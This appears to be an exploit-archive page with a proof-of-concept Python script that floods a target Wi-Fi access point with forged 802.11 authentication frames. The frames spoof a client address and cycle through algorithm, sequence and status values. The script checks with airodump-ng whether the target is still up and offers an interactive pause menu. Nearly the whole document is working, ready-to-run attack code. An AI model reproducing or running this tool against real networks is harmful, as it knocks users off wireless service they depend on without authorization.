4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit_v2.py PY
#!/usr/bin/env python
# Author: D3adPenguin (Shant Agopian)
# AuthDoS_IterAll_PauseMenu
import sys
import time
import subprocess
import signal
from termcolor import colored
from scapy.all import RadioTap, Dot11, Dot11Auth, sendp
from config import sta_target, ap_target, spray, check_interval

pause = False
target_bssid = ap_target  # Use ap_target as the target BSSID

def auth_frame(algo_value, seqnum, status):
    return RadioTap() / Dot11(type=0, subtype=11, addr1=ap_target, addr2=sta_target, addr3=ap_target) / Dot11Auth(algo=algo_value, seqnum=seqnum, status=status)

def check_bssid_status():
    # Run airodump-ng to check the status of the target BSSID
    cmd = f"airodump-ng --bssid {target_bssid} wlan1mon"
    result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    output = result.stdout
    return target_bssid in output

def construct():
    global pause
    last_check_time = time.time()

    for seqnum in range(10):
        for algo_value in range(7):
            for status in range(8):
                for n in range(spray):
                    # Check if it's time to check the target BSSID status
                    current_time = time.time()
                    if current_time - last_check_time >= check_interval:
                        last_check_time = current_time

                        # Check if the target BSSID is still up
                        if not check_bssid_status():
                            print("Target BSSID not found. Stopping attack.")
                            return

                    Auth = auth_frame(algo_value, seqnum, status)
                    frame_time = time.strftime("%H:%M:%S", time.localtime())
                    packet_info = f"\033[31m[ALGO:{algo_value}]\033[0m \033[34m[SEQNUM:{seqnum}]\033[0m \033[36m[STATUS:{status}]\033[0m"
                    sendp(Auth, inter=0.0001, count=128, iface="wlan0mon") # Please change the iface to be your currently used one
                    print(f"\033[33m[{frame_time}]\033[0m {packet_info} {colored(f'{n+1}/{spray} Packet sent', 'green')}")
                    while pause:
                        print('Program paused. Please choose an option:')
                        print('1. Modify ALGO value')
                        print('2. Modify SEQNUM value')
                        print('3. Modify STATUS value')
                        print('4. Resume program')
                        choice = input('> ')
                        if choice == '1':
                            algo_value = int(input('Enter new ALGO value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified ALGO value to {algo_value}.')
                        elif choice == '2':
                            seqnum = int(input('Enter new SEQNUM value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified SEQNUM value to {seqnum}.')
                        elif choice == '3':
                            status = int(input('Enter new STATUS value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified STATUS value to {status}.')
                        elif choice == '4':
                            pause = False
                            print('Resuming program...')
                        else:
                            print('Invalid choice. Please try again.')
                        time.sleep(0.1)  # Sleep for 100ms

def signal_handler(sig, frame):
    global pause
    pause = not pause
    if pause:
        print(colored('Program paused. Press Ctrl+C to resume...', 'yellow'))
    else:
        print(colored('Resuming program...', 'yellow'))

signal.signal(signal.SIGINT, signal_handler)

if __name__ == '__main__':
    construct()